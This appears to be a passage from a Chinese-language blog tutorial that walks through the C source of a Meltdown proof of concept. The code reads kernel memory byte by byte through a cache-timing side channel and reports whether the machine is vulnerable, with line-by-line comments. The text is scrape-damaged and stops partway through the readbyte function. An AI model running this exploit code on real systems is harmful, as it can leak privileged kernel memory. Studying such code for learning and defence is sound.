在这里intmain(int argc,char*argv[]){
int ret, fd, i, score, is_vulnerable;unsignedlong addr, size;staticchar expected[]="%s version %s";
progname = argv[0];if(argc <3)returnusage();if(sscanf(argv[1],"%lx",&addr)!=1)returnusage();if(sscanf(argv[2],"%lx",&size)!=1)returnusage();memset(target_array,1,sizeof(target_array));//将target-array数组值全部置为一
ret =set_signal();pin_cpu0();set_cache_hit_threshold();//设置 cache hit 阈值
fd =open("/proc/version", O_RDONLY);//open函数,打开路径, readonly ,成功则返回文件描述符,否则返回 -1 , /proc/version系统调用将内核信息版本返回给函数if(fd <0){
perror("open");return-1;}for(score =0, i =0; i < size; i++){
//循环遍历所有字符
ret =readbyte(fd, addr);//ret是很重要(超级重要)的返回值,readbyte函数也是该代码核心if(ret ==-1)
ret =0xff;printf("read %lx = %x %c (score=%d/%d)\n",//%x是以16进制输出整型数据,%lx就是以16进制输出长整型数据
addr, ret,isprint(ret)? ret :' ',//?就是判断的意思,true就输出:前面的,false就是后面的
ret !=0xff? hist[ret]:0,
CYCLES);if(i <sizeof(expected)&&
ret == expected[i])
score++;
addr++;}close(fd);
is_vulnerable = score >min(size,sizeof(expected))/2;if(is_vulnerable)fprintf(stderr,"VULNERABLE\n");elsefprintf(stderr,"NOT VULNERABLE\n");exit(is_vulnerable);}插入代码片
开始看看重要函数
在这里插入代码片intreadbyte(int fd,unsignedlong addr){
int i, ret =0, max =-1, maxi =-1;staticchar buf[256];memset(hist,0,sizeof(hist));//将hist参数全部设为0for(i =0; i < CYCLES; i++){
ret =pread(fd, buf,sizeof(buf),0);//,将fd读入到buf array中,成功ret=返回的字节数。if(ret <0){
perror("pread");break;}clflush_target();//Flush阶段,就是将target array在cache清空_mm_mfence